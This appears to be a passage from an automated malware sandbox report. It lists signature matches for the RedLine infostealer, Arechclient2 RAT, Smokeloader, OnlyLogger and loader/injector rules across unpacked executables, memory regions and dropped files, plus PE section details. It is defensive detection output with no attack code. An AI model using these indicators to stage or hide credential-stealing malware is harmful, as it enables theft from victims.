                  Source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.3.setup_installer.exe.2f8e26e.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 26.2.Mon1785436ae78.exe.17e0e50.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 26.2.Mon1785436ae78.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 00000018.00000002.1990631383.0000000001700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001D.00000002.4154666399.000000000184F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY | Matched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
Source: 0000001D.00000002.4147517573.0000000000400000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0000001D.00000002.4153571482.00000000017F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
Source: 00000018.00000002.1993661791.000000000176E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001A.00000002.4154343968.0000000001A2F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_DLInjector03 author = ditekSHen, description = Detects unknown loader / injector
Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000001D.00000003.1777699508.0000000003140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 7892, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: Mon17948100733a95c58.exe PID: 8056, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: Mon179e1058f256.exe PID: 8164, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 1308, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, type: DROPPED | Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll, type: DROPPED | Matched rule: MALWARE_Win_DLInjector03 author = ditekSHen, description = Detects unknown loader / injector
                  Source: libcurl.dll.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libcurlpp.dll.1.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
